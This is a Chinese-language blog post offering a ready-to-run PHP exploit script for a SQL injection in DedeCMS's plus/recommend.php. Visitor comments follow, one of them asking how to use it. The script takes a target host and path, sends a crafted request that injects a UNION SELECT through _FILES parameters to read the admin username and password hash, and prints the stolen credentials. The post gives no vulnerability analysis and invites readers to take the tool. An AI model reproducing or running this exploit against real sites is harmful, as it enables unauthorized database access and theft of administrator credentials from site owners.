正在阅读:

DedeCMS recommend.php 注入EXP

23,584

今天无意中看到园长MM发的DedeCMS recommend.php 注入利用工具,找了个站测试了一下,发现获取不到内容,郁闷了一下。

拿园长的工具来改改,改成PHP版的,喜欢的拿去。。。

关于漏洞的详情,网上好像没有人分析,代码审计我也不懂,没办法,我是小菜,分析代码的活还是交给大牛们吧。@seay牛

漏洞利用EXP

<?php
/**
 * Created by 独自等待
 * Date: 14-3-3
 * Time: 下午12:58
 * Name: dede_recommend.php
 * 独自等待博客:http://www.waitalone.cn/
 */
print_r('
+------------------------------------------------------+
             DedeCMS recommend.php 注入EXP
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                  Time:2014-03-03
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of dedecms
Example: php ' . $argv[0] . ' localhost /dedecms
+------------------------------------------------------+
    ');
    exit;
}
error_reporting(7);
$host = $argv[1];
$path = $argv[2];
$url = "http://$host/$path/plus/recommend.php";
echo '管理员密码获取中,请稍候……' . PHP_EOL;
if (@fopen($url, 'r')) {
    $exp = "$url?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@%60\\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294";
    $info = @file_get_contents($exp);
    if (preg_match('/\|(.*?)\|(.*?)<\/h2>/', $info, $match)) {
        echo '========================================' . PHP_EOL;
        echo '用户名:' . $match[1] . '     密码:' . substr($match[2], 3, 16) . PHP_EOL;
        echo '========================================' . PHP_EOL;
    } else {
        echo '未知错误,请手工尝试!' . PHP_EOL;
    }
} else {
    echo '报告大爷,网站不存在此漏洞!' . PHP_EOL;
}
//统计时间
$start_time = func_time();
//时间统计函数
function func_time()
{
    list($microsec, $sec) = explode(' ', microtime());
    return $microsec + $sec;
}

echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒';
?>

效果如下:

DedeCms recommend.php注入利用工具

参考网站:

http://0day5.com/archives/1349

http://p2j.cn/?p=798

目前有:5条访客评论,博主回复4

  1. aNsSe
    2014-08-21 03:44

    哈哈 好久没来了 来看看

  2. 匿名
    2014-09-26 17:10

    多谢博主,我正好拿来修改成python的

  3. ...
    2016-08-30 12:06

    博主,,,小白想问一下,php写的exp怎么用 =.=

    • 独自等待
      2016-08-30 14:11

      先知道原理,然后知道如何利用php/python发包,剩下的就是获取内容了,在我博客搜索exp 然后把所有的拿回去研究。

  4. 等待
    2017-11-08 15:42

    如今还没有更新么?

  5. a
    2018-10-29 21:50

    大佬后来你分析这个了吗?

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌